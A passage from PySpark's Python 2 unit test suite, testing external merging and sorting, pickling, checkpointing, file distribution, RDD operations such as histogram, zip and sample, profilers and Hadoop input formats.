sum(xrange(self.N)))
def test_medium_dataset(self):
m = ExternalMerger(self.agg, 10)
m.mergeValues(self.data)
self.assertTrue(m.spills >= 1)
self.assertEqual(sum(sum(v) for k, v in m.iteritems()),
sum(xrange(self.N)))
m = ExternalMerger(self.agg, 10)
m.mergeCombiners(map(lambda (x, y): (x, [y]), self.data * 3))
self.assertTrue(m.spills >= 1)
self.assertEqual(sum(sum(v) for k, v in m.iteritems()),
sum(xrange(self.N)) * 3)
def test_huge_dataset(self):
m = ExternalMerger(self.agg, 10, partitions=3)
m.mergeCombiners(map(lambda (k, v): (k, [str(v)]), self.data * 10))
self.assertTrue(m.spills >= 1)
self.assertEqual(sum(len(v) for k, v in m._recursive_merged_items(0)),
self.N * 10)
m._cleanup()
class SorterTests(unittest.TestCase):
def test_in_memory_sort(self):
l = range(1024)
random.shuffle(l)
sorter = ExternalSorter(1024)
self.assertEquals(sorted(l), list(sorter.sorted(l)))
self.assertEquals(sorted(l, reverse=True), list(sorter.sorted(l, reverse=True)))
self.assertEquals(sorted(l, key=lambda x: -x), list(sorter.sorted(l, key=lambda x: -x)))
self.assertEquals(sorted(l, key=lambda x: -x, reverse=True),
list(sorter.sorted(l, key=lambda x: -x, reverse=True)))
def test_external_sort(self):
l = range(1024)
random.shuffle(l)
sorter = ExternalSorter(1)
self.assertEquals(sorted(l), list(sorter.sorted(l)))
self.assertGreater(shuffle.DiskBytesSpilled, 0)
last = shuffle.DiskBytesSpilled
self.assertEquals(sorted(l, reverse=True), list(sorter.sorted(l, reverse=True)))
self.assertGreater(shuffle.DiskBytesSpilled, last)
last = shuffle.DiskBytesSpilled
self.assertEquals(sorted(l, key=lambda x: -x), list(sorter.sorted(l, key=lambda x: -x)))
self.assertGreater(shuffle.DiskBytesSpilled, last)
last = shuffle.DiskBytesSpilled
self.assertEquals(sorted(l, key=lambda x: -x, reverse=True),
list(sorter.sorted(l, key=lambda x: -x, reverse=True)))
self.assertGreater(shuffle.DiskBytesSpilled, last)
def test_external_sort_in_rdd(self):
conf = SparkConf().set("spark.python.worker.memory", "1m")
sc = SparkContext(conf=conf)
l = range(10240)
random.shuffle(l)
rdd = sc.parallelize(l, 10)
self.assertEquals(sorted(l), rdd.sortBy(lambda x: x).collect())
sc.stop()
class SerializationTestCase(unittest.TestCase):
def test_namedtuple(self):
from collections import namedtuple
from cPickle import dumps, loads
P = namedtuple("P", "x y")
p1 = P(1, 3)
p2 = loads(dumps(p1, 2))
self.assertEquals(p1, p2)
def test_itemgetter(self):
from operator import itemgetter
ser = CloudPickleSerializer()
d = range(10)
getter = itemgetter(1)
getter2 = ser.loads(ser.dumps(getter))
self.assertEqual(getter(d), getter2(d))
getter = itemgetter(0, 3)
getter2 = ser.loads(ser.dumps(getter))
self.assertEqual(getter(d), getter2(d))
def test_attrgetter(self):
from operator import attrgetter
ser = CloudPickleSerializer()
class C(object):
def __getattr__(self, item):
return item
d = C()
getter = attrgetter("a")
getter2 = ser.loads(ser.dumps(getter))
self.assertEqual(getter(d), getter2(d))
getter = attrgetter("a", "b")
getter2 = ser.loads(ser.dumps(getter))
self.assertEqual(getter(d), getter2(d))
d.e = C()
getter = attrgetter("e.a")
getter2 = ser.loads(ser.dumps(getter))
self.assertEqual(getter(d), getter2(d))
getter = attrgetter("e.a", "e.b")
getter2 = ser.loads(ser.dumps(getter))
self.assertEqual(getter(d), getter2(d))
# Regression test for SPARK-3415
def test_pickling_file_handles(self):
ser = CloudPickleSerializer()
out1 = sys.stderr
out2 = ser.loads(ser.dumps(out1))
self.assertEquals(out1, out2)
def test_func_globals(self):
class Unpicklable(object):
def __reduce__(self):
raise Exception("not picklable")
global exit
exit = Unpicklable()
ser = CloudPickleSerializer()
self.assertRaises(Exception, lambda: ser.dumps(exit))
def foo():
sys.exit(0)
self.assertTrue("exit" in foo.func_code.co_names)
ser.dumps(foo)
def test_compressed_serializer(self):
ser = CompressedSerializer(PickleSerializer())
from StringIO import StringIO
io = StringIO()
ser.dump_stream(["abc", u"123", range(5)], io)
io.seek(0)
self.assertEqual(["abc", u"123", range(5)], list(ser.load_stream(io)))
ser.dump_stream(range(1000), io)
io.seek(0)
self.assertEqual(["abc", u"123", range(5)] + range(1000), list(ser.load_stream(io)))
class PySparkTestCase(unittest.TestCase):
def setUp(self):
self._old_sys_path = list(sys.path)
class_name = self.__class__.__name__
self.sc = SparkContext('local[4]', class_name)
def tearDown(self):
self.sc.stop()
sys.path = self._old_sys_path
class ReusedPySparkTestCase(unittest.TestCase):
@classmethod
def setUpClass(cls):
cls.sc = SparkContext('local[4]', cls.__name__)
@classmethod
def tearDownClass(cls):
cls.sc.stop()
class CheckpointTests(ReusedPySparkTestCase):
def setUp(self):
self.checkpointDir = tempfile.NamedTemporaryFile(delete=False)
os.unlink(self.checkpointDir.name)
self.sc.setCheckpointDir(self.checkpointDir.name)
def tearDown(self):
shutil.rmtree(self.checkpointDir.name)
def test_basic_checkpointing(self):
parCollection = self.sc.parallelize([1, 2, 3, 4])
flatMappedRDD = parCollection.flatMap(lambda x: range(1, x + 1))
self.assertFalse(flatMappedRDD.isCheckpointed())
self.assertTrue(flatMappedRDD.getCheckpointFile() is None)
flatMappedRDD.checkpoint()
result = flatMappedRDD.collect()
time.sleep(1) # 1 second
self.assertTrue(flatMappedRDD.isCheckpointed())
self.assertEqual(flatMappedRDD.collect(), result)
self.assertEqual("file:" + self.checkpointDir.name,
os.path.dirname(os.path.dirname(flatMappedRDD.getCheckpointFile())))
def test_checkpoint_and_restore(self):
parCollection = self.sc.parallelize([1, 2, 3, 4])
flatMappedRDD = parCollection.flatMap(lambda x: [x])
self.assertFalse(flatMappedRDD.isCheckpointed())
self.assertTrue(flatMappedRDD.getCheckpointFile() is None)
flatMappedRDD.checkpoint()
flatMappedRDD.count() # forces a checkpoint to be computed
time.sleep(1) # 1 second
self.assertTrue(flatMappedRDD.getCheckpointFile() is not None)
recovered = self.sc._checkpointFile(flatMappedRDD.getCheckpointFile(),
flatMappedRDD._jrdd_deserializer)
self.assertEquals([1, 2, 3, 4], recovered.collect())
class AddFileTests(PySparkTestCase):
def test_add_py_file(self):
# To ensure that we're actually testing addPyFile's effects, check that
# this job fails due to `userlibrary` not being on the Python path:
# disable logging in log4j temporarily
log4j = self.sc._jvm.org.apache.log4j
old_level = log4j.LogManager.getRootLogger().getLevel()
log4j.LogManager.getRootLogger().setLevel(log4j.Level.FATAL)
def func(x):
from userlibrary import UserClass
return UserClass().hello()
self.assertRaises(Exception,
self.sc.parallelize(range(2)).map(func).first)
log4j.LogManager.getRootLogger().setLevel(old_level)
# Add the file, so the job should now succeed:
path = os.path.join(SPARK_HOME, "python/test_support/userlibrary.py")
self.sc.addPyFile(path)
res = self.sc.parallelize(range(2)).map(func).first()
self.assertEqual("Hello World!", res)
def test_add_file_locally(self):
path = os.path.join(SPARK_HOME, "python/test_support/hello.txt")
self.sc.addFile(path)
download_path = SparkFiles.get("hello.txt")
self.assertNotEqual(path, download_path)
with open(download_path) as test_file:
self.assertEquals("Hello World!\n", test_file.readline())
def test_add_py_file_locally(self):
# To ensure that we're actually testing addPyFile's effects, check that
# this fails due to `userlibrary` not being on the Python path:
def func():
from userlibrary import UserClass
self.assertRaises(ImportError, func)
path = os.path.join(SPARK_HOME, "python/test_support/userlibrary.py")
self.sc.addFile(path)
from userlibrary import UserClass
self.assertEqual("Hello World!", UserClass().hello())
def test_add_egg_file_locally(self):
# To ensure that we're actually testing addPyFile's effects, check that
# this fails due to `userlibrary` not being on the Python path:
def func():
from userlib import UserClass
self.assertRaises(ImportError, func)
path = os.path.join(SPARK_HOME, "python/test_support/userlib-0.1-py2.7.egg")
self.sc.addPyFile(path)
from userlib import UserClass
self.assertEqual("Hello World from inside a package!", UserClass().hello())
def test_overwrite_system_module(self):
self.sc.addPyFile(os.path.join(SPARK_HOME, "python/test_support/SimpleHTTPServer.py"))
import SimpleHTTPServer
self.assertEqual("My Server", SimpleHTTPServer.__name__)
def func(x):
import SimpleHTTPServer
return SimpleHTTPServer.__name__
self.assertEqual(["My Server"], self.sc.parallelize(range(1)).map(func).collect())
class RDDTests(ReusedPySparkTestCase):
def test_id(self):
rdd = self.sc.parallelize(range(10))
id = rdd.id()
self.assertEqual(id, rdd.id())
rdd2 = rdd.map(str).filter(bool)
id2 = rdd2.id()
self.assertEqual(id + 1, id2)
self.assertEqual(id2, rdd2.id())
def test_save_as_textfile_with_unicode(self):
# Regression test for SPARK-970
x = u"\u00A1Hola, mundo!"
data = self.sc.parallelize([x])
tempFile = tempfile.NamedTemporaryFile(delete=True)
tempFile.close()
data.saveAsTextFile(tempFile.name)
raw_contents = ''.join(input(glob(tempFile.name + "/part-0000*")))
self.assertEqual(x, unicode(raw_contents.strip(), "utf-8"))
def test_save_as_textfile_with_utf8(self):
x = u"\u00A1Hola, mundo!"
data = self.sc.parallelize([x.encode("utf-8")])
tempFile = tempfile.NamedTemporaryFile(delete=True)
tempFile.close()
data.saveAsTextFile(tempFile.name)
raw_contents = ''.join(input(glob(tempFile.name + "/part-0000*")))
self.assertEqual(x, unicode(raw_contents.strip(), "utf-8"))
def test_transforming_cartesian_result(self):
# Regression test for SPARK-1034
rdd1 = self.sc.parallelize([1, 2])
rdd2 = self.sc.parallelize([3, 4])
cart = rdd1.cartesian(rdd2)
result = cart.map(lambda (x, y): x + y).collect()
def test_transforming_pickle_file(self):
# Regression test for SPARK-2601
data = self.sc.parallelize(["Hello", "World!"])
tempFile = tempfile.NamedTemporaryFile(delete=True)
tempFile.close()
data.saveAsPickleFile(tempFile.name)
pickled_file = self.sc.pickleFile(tempFile.name)
pickled_file.map(lambda x: x).collect()
def test_cartesian_on_textfile(self):
# Regression test for
path = os.path.join(SPARK_HOME, "python/test_support/hello.txt")
a = self.sc.textFile(path)
result = a.cartesian(a).collect()
(x, y) = result[0]
self.assertEqual("Hello World!", x.strip())
self.assertEqual("Hello World!", y.strip())
def test_deleting_input_files(self):
# Regression test for SPARK-1025
tempFile = tempfile.NamedTemporaryFile(delete=False)
tempFile.write("Hello World!")
tempFile.close()
data = self.sc.textFile(tempFile.name)
filtered_data = data.filter(lambda x: True)
self.assertEqual(1, filtered_data.count())
os.unlink(tempFile.name)
self.assertRaises(Exception, lambda: filtered_data.count())
def test_sampling_default_seed(self):
# Test for SPARK-3995 (default seed setting)
data = self.sc.parallelize(range(1000), 1)
subset = data.takeSample(False, 10)
self.assertEqual(len(subset), 10)
def test_aggregate_by_key(self):
data = self.sc.parallelize([(1, 1), (1, 1), (3, 2), (5, 1), (5, 3)], 2)
def seqOp(x, y):
x.add(y)
return x
def combOp(x, y):
x |= y
return x
sets = dict(data.aggregateByKey(set(), seqOp, combOp).collect())
self.assertEqual(3, len(sets))
self.assertEqual(set([1]), sets[1])
self.assertEqual(set([2]), sets[3])
self.assertEqual(set([1, 3]), sets[5])
def test_itemgetter(self):
rdd = self.sc.parallelize([range(10)])
from operator import itemgetter
self.assertEqual([1], rdd.map(itemgetter(1)).collect())
self.assertEqual([(2, 3)], rdd.map(itemgetter(2, 3)).collect())
def test_namedtuple_in_rdd(self):
from collections import namedtuple
Person = namedtuple("Person", "id firstName lastName")
jon = Person(1, "Jon", "Doe")
jane = Person(2, "Jane", "Doe")
theDoes = self.sc.parallelize([jon, jane])
self.assertEquals([jon, jane], theDoes.collect())
def test_large_broadcast(self):
N = 100000
data = [[float(i) for i in range(300)] for i in range(N)]
bdata = self.sc.broadcast(data) # 270MB
m = self.sc.parallelize(range(1), 1).map(lambda x: len(bdata.value)).sum()
self.assertEquals(N, m)
def test_multiple_broadcasts(self):
N = 1 << 21
b1 = self.sc.broadcast(set(range(N))) # multiple blocks in JVM
r = range(1 << 15)
random.shuffle(r)
s = str(r)
checksum = hashlib.md5(s).hexdigest()
b2 = self.sc.broadcast(s)
r = list(set(self.sc.parallelize(range(10), 10).map(
lambda x: (len(b1.value), hashlib.md5(b2.value).hexdigest())).collect()))
self.assertEqual(1, len(r))
size, csum = r[0]
self.assertEqual(N, size)
self.assertEqual(checksum, csum)
random.shuffle(r)
s = str(r)
checksum = hashlib.md5(s).hexdigest()
b2 = self.sc.broadcast(s)
r = list(set(self.sc.parallelize(range(10), 10).map(
lambda x: (len(b1.value), hashlib.md5(b2.value).hexdigest())).collect()))
self.assertEqual(1, len(r))
size, csum = r[0]
self.assertEqual(N, size)
self.assertEqual(checksum, csum)
def test_large_closure(self):
N = 1000000
data = [float(i) for i in xrange(N)]
rdd = self.sc.parallelize(range(1), 1).map(lambda x: len(data))
self.assertEquals(N, rdd.first())
self.assertTrue(rdd._broadcast is not None)
rdd = self.sc.parallelize(range(1), 1).map(lambda x: 1)
self.assertEqual(1, rdd.first())
self.assertTrue(rdd._broadcast is None)
def test_zip_with_different_serializers(self):
a = self.sc.parallelize(range(5))
b = self.sc.parallelize(range(100, 105))
self.assertEqual(a.zip(b).collect(), [(0, 100), (1, 101), (2, 102), (3, 103), (4, 104)])
a = a._reserialize(BatchedSerializer(PickleSerializer(), 2))
b = b._reserialize(MarshalSerializer())
self.assertEqual(a.zip(b).collect(), [(0, 100), (1, 101), (2, 102), (3, 103), (4, 104)])
# regression test for SPARK-4841
path = os.path.join(SPARK_HOME, "python/test_support/hello.txt")
t = self.sc.textFile(path)
cnt = t.count()
self.assertEqual(cnt, t.zip(t).count())
rdd = t.map(str)
self.assertEqual(cnt, t.zip(rdd).count())
# regression test for bug in _reserializer()
self.assertEqual(cnt, t.zip(rdd).count())
def test_zip_with_different_number_of_items(self):
a = self.sc.parallelize(range(5), 2)
# different number of partitions
b = self.sc.parallelize(range(100, 106), 3)
self.assertRaises(ValueError, lambda: a.zip(b))
# different number of batched items in JVM
b = self.sc.parallelize(range(100, 104), 2)
self.assertRaises(Exception, lambda: a.zip(b).count())
# different number of items in one pair
b = self.sc.parallelize(range(100, 106), 2)
self.assertRaises(Exception, lambda: a.zip(b).count())
# same total number of items, but different distributions
a = self.sc.parallelize([2, 3], 2).flatMap(range)
b = self.sc.parallelize([3, 2], 2).flatMap(range)
self.assertEquals(a.count(), b.count())
self.assertRaises(Exception, lambda: a.zip(b).count())
def test_count_approx_distinct(self):
rdd = self.sc.parallelize(range(1000))
self.assertTrue(950 < rdd.countApproxDistinct(0.04) < 1050)
self.assertTrue(950 < rdd.map(float).countApproxDistinct(0.04) < 1050)
self.assertTrue(950 < rdd.map(str).countApproxDistinct(0.04) < 1050)
self.assertTrue(950 < rdd.map(lambda x: (x, -x)).countApproxDistinct(0.04) < 1050)
rdd = self.sc.parallelize([i % 20 for i in range(1000)], 7)
self.assertTrue(18 < rdd.countApproxDistinct() < 22)
self.assertTrue(18 < rdd.map(float).countApproxDistinct() < 22)
self.assertTrue(18 < rdd.map(str).countApproxDistinct() < 22)
self.assertTrue(18 < rdd.map(lambda x: (x, -x)).countApproxDistinct() < 22)
self.assertRaises(ValueError, lambda: rdd.countApproxDistinct(0.00000001))
self.assertRaises(ValueError, lambda: rdd.countApproxDistinct(0.5))
def test_histogram(self):
# empty
rdd = self.sc.parallelize([])
self.assertEquals([0], rdd.histogram([0, 10])[1])
self.assertEquals([0, 0], rdd.histogram([0, 4, 10])[1])
self.assertRaises(ValueError, lambda: rdd.histogram(1))
# out of range
rdd = self.sc.parallelize([10.01, -0.01])
self.assertEquals([0], rdd.histogram([0, 10])[1])
self.assertEquals([0, 0], rdd.histogram((0, 4, 10))[1])
# in range with one bucket
rdd = self.sc.parallelize(range(1, 5))
self.assertEquals([4], rdd.histogram([0, 10])[1])
self.assertEquals([3, 1], rdd.histogram([0, 4, 10])[1])
# in range with one bucket exact match
self.assertEquals([4], rdd.histogram([1, 4])[1])
# out of range with two buckets
rdd = self.sc.parallelize([10.01, -0.01])
self.assertEquals([0, 0], rdd.histogram([0, 5, 10])[1])
# out of range with two uneven buckets
rdd = self.sc.parallelize([10.01, -0.01])
self.assertEquals([0, 0], rdd.histogram([0, 4, 10])[1])
# in range with two buckets
rdd = self.sc.parallelize([1, 2, 3, 5, 6])
self.assertEquals([3, 2], rdd.histogram([0, 5, 10])[1])
# in range with two bucket and None
rdd = self.sc.parallelize([1, 2, 3, 5, 6, None, float('nan')])
self.assertEquals([3, 2], rdd.histogram([0, 5, 10])[1])
# in range with two uneven buckets
rdd = self.sc.parallelize([1, 2, 3, 5, 6])
self.assertEquals([3, 2], rdd.histogram([0, 5, 11])[1])
# mixed range with two uneven buckets
rdd = self.sc.parallelize([-0.01, 0.0, 1, 2, 3, 5, 6, 11.0, 11.01])
self.assertEquals([4, 3], rdd.histogram([0, 5, 11])[1])
# mixed range with four uneven buckets
rdd = self.sc.parallelize([-0.01, 0.0, 1, 2, 3, 5, 6, 11.01, 12.0, 199.0, 200.0, 200.1])
self.assertEquals([4, 2, 1, 3], rdd.histogram([0.0, 5.0, 11.0, 12.0, 200.0])[1])
# mixed range with uneven buckets and NaN
rdd = self.sc.parallelize([-0.01, 0.0, 1, 2, 3, 5, 6, 11.01, 12.0,
199.0, 200.0, 200.1, None, float('nan')])
self.assertEquals([4, 2, 1, 3], rdd.histogram([0.0, 5.0, 11.0, 12.0, 200.0])[1])
# out of range with infinite buckets
rdd = self.sc.parallelize([10.01, -0.01, float('nan'), float("inf")])
self.assertEquals([1, 2], rdd.histogram([float('-inf'), 0, float('inf')])[1])
# invalid buckets
self.assertRaises(ValueError, lambda: rdd.histogram([]))
self.assertRaises(ValueError, lambda: rdd.histogram([1]))
self.assertRaises(ValueError, lambda: rdd.histogram(0))
self.assertRaises(TypeError, lambda: rdd.histogram({}))
# without buckets
rdd = self.sc.parallelize(range(1, 5))
self.assertEquals(([1, 4], [4]), rdd.histogram(1))
# without buckets single element
rdd = self.sc.parallelize([1])
self.assertEquals(([1, 1], [1]), rdd.histogram(1))
# without bucket no range
rdd = self.sc.parallelize([1] * 4)
self.assertEquals(([1, 1], [4]), rdd.histogram(1))
# without buckets basic two
rdd = self.sc.parallelize(range(1, 5))
self.assertEquals(([1, 2.5, 4], [2, 2]), rdd.histogram(2))
# without buckets with more requested than elements
rdd = self.sc.parallelize([1, 2])
buckets = [1 + 0.2 * i for i in range(6)]
hist = [1, 0, 0, 0, 1]
self.assertEquals((buckets, hist), rdd.histogram(5))
# invalid RDDs
rdd = self.sc.parallelize([1, float('inf')])
self.assertRaises(ValueError, lambda: rdd.histogram(2))
rdd = self.sc.parallelize([float('nan')])
self.assertRaises(ValueError, lambda: rdd.histogram(2))
# string
rdd = self.sc.parallelize(["ab", "ac", "b", "bd", "ef"], 2)
self.assertEquals([2, 2], rdd.histogram(["a", "b", "c"])[1])
self.assertEquals((["ab", "ef"], [5]), rdd.histogram(1))
self.assertRaises(TypeError, lambda: rdd.histogram(2))
# mixed RDD
rdd = self.sc.parallelize([1, 4, "ab", "ac", "b"], 2)
self.assertEquals([1, 1], rdd.histogram([0, 4, 10])[1])
self.assertEquals([2, 1], rdd.histogram(["a", "b", "c"])[1])
self.assertEquals(([1, "b"], [5]), rdd.histogram(1))
self.assertRaises(TypeError, lambda: rdd.histogram(2))
def test_repartitionAndSortWithinPartitions(self):
rdd = self.sc.parallelize([(0, 5), (3, 8), (2, 6), (0, 8), (3, 8), (1, 3)], 2)
repartitioned = rdd.repartitionAndSortWithinPartitions(2, lambda key: key % 2)
partitions = repartitioned.glom().collect()
self.assertEquals(partitions[0], [(0, 5), (0, 8), (2, 6)])
self.assertEquals(partitions[1], [(1, 3), (3, 8), (3, 8)])
def test_distinct(self):
rdd = self.sc.parallelize((1, 2, 3)*10, 10)
self.assertEquals(rdd.getNumPartitions(), 10)
self.assertEquals(rdd.distinct().count(), 3)
result = rdd.distinct(5)
self.assertEquals(result.getNumPartitions(), 5)
self.assertEquals(result.count(), 3)
def test_sort_on_empty_rdd(self):
self.assertEqual([], self.sc.parallelize(zip([], [])).sortByKey().collect())
def test_sample(self):
rdd = self.sc.parallelize(range(0, 100), 4)
wo = rdd.sample(False, 0.1, 2).collect()
wo_dup = rdd.sample(False, 0.1, 2).collect()
self.assertSetEqual(set(wo), set(wo_dup))
wr = rdd.sample(True, 0.2, 5).collect()
wr_dup = rdd.sample(True, 0.2, 5).collect()
self.assertSetEqual(set(wr), set(wr_dup))
wo_s10 = rdd.sample(False, 0.3, 10).collect()
wo_s20 = rdd.sample(False, 0.3, 20).collect()
self.assertNotEqual(set(wo_s10), set(wo_s20))
wr_s11 = rdd.sample(True, 0.4, 11).collect()
wr_s21 = rdd.sample(True, 0.4, 21).collect()
self.assertNotEqual(set(wr_s11), set(wr_s21))
def test_null_in_rdd(self):
jrdd = self.sc._jvm.PythonUtils.generateRDDWithNull(self.sc._jsc)
rdd = RDD(jrdd, self.sc, UTF8Deserializer())
self.assertEqual([u"a", None, u"b"], rdd.collect())
rdd = RDD(jrdd, self.sc, NoOpSerializer())
self.assertEqual(["a", None, "b"], rdd.collect())
def test_multiple_python_java_RDD_conversions(self):
# Regression test for SPARK-5361
data = [
(u'1', {u'director': u'David Lean'}),
(u'2', {u'director': u'Andrew Dominik'})
]
from pyspark.rdd import RDD
data_rdd = self.sc.parallelize(data)
data_java_rdd = data_rdd._to_java_object_rdd()
data_python_rdd = self.sc._jvm.SerDe.javaToPython(data_java_rdd)
converted_rdd = RDD(data_python_rdd, self.sc)
self.assertEqual(2, converted_rdd.count())
# conversion between python and java RDD threw exceptions
data_java_rdd = converted_rdd._to_java_object_rdd()
data_python_rdd = self.sc._jvm.SerDe.javaToPython(data_java_rdd)
converted_rdd = RDD(data_python_rdd, self.sc)
self.assertEqual(2, converted_rdd.count())
class ProfilerTests(PySparkTestCase):
def setUp(self):
self._old_sys_path = list(sys.path)
class_name = self.__class__.__name__
conf = SparkConf().set("spark.python.profile", "true")
self.sc = SparkContext('local[4]', class_name, conf=conf)
def test_profiler(self):
self.do_computation()
profilers = self.sc.profiler_collector.profilers
self.assertEqual(1, len(profilers))
id, profiler, _ = profilers[0]
stats = profiler.stats()
self.assertTrue(stats is not None)
width, stat_list = stats.get_print_list([])
func_names = [func_name for fname, n, func_name in stat_list]
self.assertTrue("heavy_foo" in func_names)
self.sc.show_profiles()
d = tempfile.gettempdir()
self.sc.dump_profiles(d)
self.assertTrue("rdd_%d.pstats" % id in os.listdir(d))
def test_custom_profiler(self):
class TestCustomProfiler(BasicProfiler):
def show(self, id):
self.result = "Custom formatting"
self.sc.profiler_collector.profiler_cls = TestCustomProfiler
self.do_computation()
profilers = self.sc.profiler_collector.profilers
self.assertEqual(1, len(profilers))
_, profiler, _ = profilers[0]
self.assertTrue(isinstance(profiler, TestCustomProfiler))
self.sc.show_profiles()
self.assertEqual("Custom formatting", profiler.result)
def do_computation(self):
def heavy_foo(x):
for i in range(1 << 20):
x = 1
rdd = self.sc.parallelize(range(100))
rdd.foreach(heavy_foo)
class InputFormatTests(ReusedPySparkTestCase):
@classmethod
def setUpClass(cls):
ReusedPySparkTestCase.setUpClass()
cls.tempdir = tempfile.NamedTemporaryFile(delete=False)
os.unlink(cls.tempdir.name)
cls.sc._jvm.WriteInputFormatTestDataGenerator.generateData(cls.tempdir.name, cls.sc._jsc)
@classmethod
def tearDownClass(cls):
ReusedPySparkTestCase.tearDownClass()
shutil.rmtree(cls.tempdir.name)
def test_sequencefiles(self):
basepath = self.tempdir.name
ints = sorted(self.sc.sequenceFile(basepath + "/sftestdata/sfint/",
"org.apache.hadoop.io.IntWritable",
"org.apache.hadoop.io.Text").collect())
ei = [(1, u'aa'), (1, u'aa'), (2, u'aa'), (2, u'bb'), (2, u'bb'), (3, u'cc')]
self.assertEqual(ints, ei)
doubles = sorted(self.sc.sequenceFile(basepath + "/sftestdata/sfdouble/",
"org.apache.hadoop.io.DoubleWritable",
"org.apache.hadoop.io.Text").collect())
ed = [(1.0, u'aa'), (1.0, u'aa'), (2.0, u'aa'), (2.0, u'bb'), (2.0, u'bb'), (3.0, u'cc')]
self.assertEqual(doubles, ed)
bytes = sorted(self.sc.sequenceFile(basepath + "/sftestdata/sfbytes/",
"org.apache.hadoop.io.IntWritable",
"org.apache.hadoop.io.BytesWritable").collect())
ebs = [(1, bytearray('aa', 'utf-8')),
(1, bytearray('aa', 'utf-8')),
(2, bytearray('aa', 'utf-8')),
(2, bytearray('bb', 'utf-8')),
(2, bytearray('bb', 'utf-8')),
(3, bytearray('cc', 'utf-8'))]
self.assertEqual(bytes, ebs)
text = sorted(self.sc.sequenceFile(basepath + "/sftestdata/sftext/",
"org.apache.hadoop.io.Text",
"org.apache.hadoop.io.Text").collect())
et = [(u'1', u'aa'),
(u'1', u'aa'),
(u'2', u'aa'),
(u'2', u'bb'),
(u'2', u'bb'),
(u'3', u'cc')]
self.assertEqual(text, et)
bools = sorted(self.sc.sequenceFile(basepath + "/sftestdata/sfbool/",
"org.apache.hadoop.io.IntWritable",
"org.apache.hadoop.io.BooleanWritable").collect())
eb = [(1, False), (1, True), (2, False), (2, False), (2, True), (3, True)]
self.assertEqual(bools, eb)
nulls = sorted(self.sc.sequenceFile(basepath + "/sftestdata/sfnull/",
"org.apache.hadoop.io.IntWritable",
"org.apache.hadoop.io.BooleanWritable").collect())
en = [(1, None), (1, None), (2, None), (2, None), (2, None), (3, None)]
self.assertEqual(nulls, en)
maps = sorted(self.sc.sequenceFile(basepath + "/sftestdata/sfmap/",
"org.apache.hadoop.io.IntWritable",
"org.apache.hadoop.io.MapWritable").collect())
em = [(1, {}),
(1, {3.0: u'bb'}),
(2, {1.0: u'aa'}),
(2, {1.0: u'cc'}),
(3, {2.0: u'dd'})]
self.assertEqual(maps, em)
# arrays get pickled to tuples by default
tuples = sorted(self.sc.sequenceFile(
basepath + "/sftestdata/sfarray/",
"org.apache.hadoop.io.IntWritable",
"org.apache.spark.api.python.DoubleArrayWritable").collect())
et = [(1, ()),
(2, (3.0, 4.0, 5.0)),
(3, (4.0, 5.0, 6.0))]
self.assertEqual(tuples, et)
# with custom converters, primitive arrays can stay as arrays
arrays = sorted(self.sc.sequenceFile(
basepath + "/sftestdata/sfarray/",
"org.apache.hadoop.io.IntWritable",
"org.apache.spark.api.python.DoubleArrayWritable",
valueConverter="org.apache.spark.api.python.WritableToDoubleArrayConverter").collect())
ea = [(1, array('d')),
(2, array('d', [3.0, 4.0, 5.0])),
(3, array('d', [4.0, 5.0, 6.0]))]
self.assertEqual(arrays, ea)
clazz = sorted(self.sc.sequenceFile(basepath + "/sftestdata/sfclass/",
"org.apache.hadoop.io.Text",
"org.apache.spark.api.python.TestWritable").collect())
cname = u'org.apache.spark.api.python.TestWritable'
ec = [(u'1', {u'__class__': cname, u'double': 1.0, u'int': 1, u'str': u'test1'}),
(u'2', {u'__class__': cname, u'double': 2.3, u'int': 2, u'str': u'test2'}),
(u'3', {u'__class__': cname, u'double': 3.1, u'int': 3, u'str': u'test3'}),
(u'4', {u'__class__': cname, u'double': 4.2, u'int': 4, u'str': u'test4'}),
(u'5', {u'__class__': cname, u'double': 5.5, u'int': 5, u'str': u'test56'})]
self.assertEqual(clazz, ec)
unbatched_clazz = sorted(self.sc.sequenceFile(basepath + "/sftestdata/sfclass/",
"org.apache.hadoop.io.Text",
"org.apache.spark.api.python.TestWritable",
).collect())
self.assertEqual(unbatched_clazz, ec)
def test_oldhadoop(self):
basepath = self.tempdir.name
ints = sorted(self.sc.hadoopFile(basepath + "/sftestdata/sfint/",
"org.apache.hadoop.mapred.SequenceFileInputFormat",
"org.apache.hadoop.io.IntWritable",
"org.apache.hadoop.io.Text").collect())
ei = [(1, u'aa'), (1, u'aa'), (2, u'aa'), (2, u'bb'), (2, u'bb'), (3, u'cc')]
self.assertEqual(ints, ei)
hellopath = os.path.join(SPARK_HOME, "python/test_support/hello.txt")
oldconf = {"mapred.input.dir": hellopath}
hello = self.sc.hadoopRDD("org.apache.hadoop.mapred.TextInputFormat",
"org.apache.hadoop.io.LongWritable",
"org.apache.hadoop.io.Text",
conf=oldconf).collect()
result = [(0, u'Hello World!')]
self.assertEqual(hello, result)
def test_newhadoop(self):
basepath = self.tempdir.name
ints = sorted(self.sc.newAPIHadoopFile(
basepath + "/sftestdata/sfint/",
"org.apache.hadoop.mapreduce.lib.input.SequenceFileInputFormat",
"org.apache.hadoop.io.IntWritable",
"org.apache.hadoop.io.Text").collect())
ei = [(1, u'aa'), (1, u'aa'), (2, u'aa'), (2, u'bb'), (2, u'bb'), (3, u'cc')]
self.assertEqual(ints, ei)
hellopath = os.path.join(SPARK_HOME, "python/test_support/hello.txt")
newconf = {"mapred.input.dir": hellopath}
hello = self.sc.newAPIHadoopRDD("org.apache.hadoop.mapreduce.lib.input.TextInputFormat",
"org.apache.hadoop.io.LongWritable",
"org.apache.hadoop.io.Text",
conf=newconf).collect()
result = [(0, u'Hello World!')]
self.assertEqual(hello, result)
def test_newolderror(self):
basepath = self.tempdir.name
self.assertRaises(Exception, lambda: self.sc.hadoopFile(
basepath + "/sftestdata/sfint/",
"org.apache.hadoop.mapreduce.lib.input.SequenceFileInputFormat",
"org.apache.hadoop.io.IntWritable",
"org.apache.hadoop.io.Text"))
self.assertRaises(Exception, lambda: self.sc.newAPIHadoopFile(
basepath + "/sftestdata/sfint/",
"org.apache.hadoop.mapred.SequenceFileInputFormat",
"org.apache.hadoop.io.IntWritable",
"org.apache.hadoop.io.Text"))
def test_bad_inputs(self):
basepath = self.tempdir.name
self.assertRaises(Exception, lambda: self.sc.sequenceFile(
basepath + "/sftestdata/sfint/",
"org.apache.hadoop.io.NotValidWritable",
"org.apache.hadoop.io.Text"))
self.assertRaises(Exception, lambda: self.sc.hadoopFile(
basepath + "/sftestdata/sfint/",
"org.apache.hadoop.mapred.NotValidInputFormat",
"org.apache.hadoop.io.IntWritable",
"org.apache.hadoop.io.Text"))
